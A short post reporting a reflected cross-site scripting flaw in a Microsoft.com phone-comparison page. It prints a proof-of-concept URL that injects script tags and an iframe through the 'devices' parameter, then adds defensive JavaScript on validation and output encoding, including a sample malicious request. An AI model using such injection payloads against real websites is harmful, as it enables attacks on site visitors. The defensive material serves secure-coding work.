One more XSS vulnerability found in Microsoft.com



Earlier this month, security researcher @flexxpoint discovered a cross-site scripting vulnerability in Microsoft's official website (microsoft.com). Now, one more XSS vulnerability has been found by grey hat hacker "Sony" and Flexxpoint.

The "devices" field in the 'Compare Windows Phones' page of Microsoft.com was found to be vulnerable to this attack.


POC:
http://www.microsoft.com/windowsphone/en-us/buy/7/compare.aspx?devices=""><script>alert("XSS by Sony and Flexxpoint")</script><script>alert("Oh..")</script><script>alert("Uh..")</script><script>alert("wow..")</script><script>alert("Microsoft.com Cross Site Scripting")</script><script>alert("meow!")</script><iframe width="420" height="315" src="http://www.youtube.com/embed/SLcBI3JUKZ4" frameborder="0" allowfullscreen></iframe>
Yet they haven't fixed the previous XSS finding. It seems that Microsoft doesn't care about the vulnerabilities in its website.
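
How a reflected query value like "devices" is closed off on the server side, shown as an added example that is not code from this post or from Microsoft. It assumes the value lands inside a quoted HTML attribute; the hidden-input template, the id format, the four-device limit and the site.example host are all hypothetical.

```javascript
// Added example. Template, id format and host are assumptions, not Microsoft's code.
const ATTR_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode a value for use inside a quoted HTML attribute.
function encodeAttr(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ATTR_ESCAPES[ch]);
}

// Vulnerable pattern: the raw query value is concatenated into the markup,
// so a quote followed by ">" ends the attribute and the tag.
function renderVulnerable(devices) {
  return '<input type="hidden" name="devices" value="' + devices + '">';
}

// Hardened, step 1: accept only a short comma-separated list of plain ids.
function parseDevices(raw) {
  const ids = String(raw).split(',').map((s) => s.trim()).filter(Boolean);
  const valid = ids.length > 0 && ids.length <= 4 &&
    ids.every((id) => /^[A-Za-z0-9_-]{1,32}$/.test(id));
  return valid ? ids : null;
}

// Hardened, step 2: encode on output even after validation passed.
function renderSafe(raw) {
  const ids = parseDevices(raw);
  if (ids === null) return '<input type="hidden" name="devices" value="">';
  return '<input type="hidden" name="devices" value="' + encodeAttr(ids.join(',')) + '">';
}

// Read the parameter from a full URL the way a request handler would.
function devicesFromUrl(url) {
  return new URL(url).searchParams.get('devices') || '';
}

// Constructed sample requests; the second follows the shape of the PoC above.
const SAMPLE_GOOD = 'http://site.example/compare.aspx?devices=phone-a,phone-b';
const SAMPLE_BAD = 'http://site.example/compare.aspx?devices=' +
  encodeURIComponent('""><script>alert("XSS")</script>');
```

Validation rejects the request outright, while encodeAttr is the control that still holds if the allow-list is ever loosened.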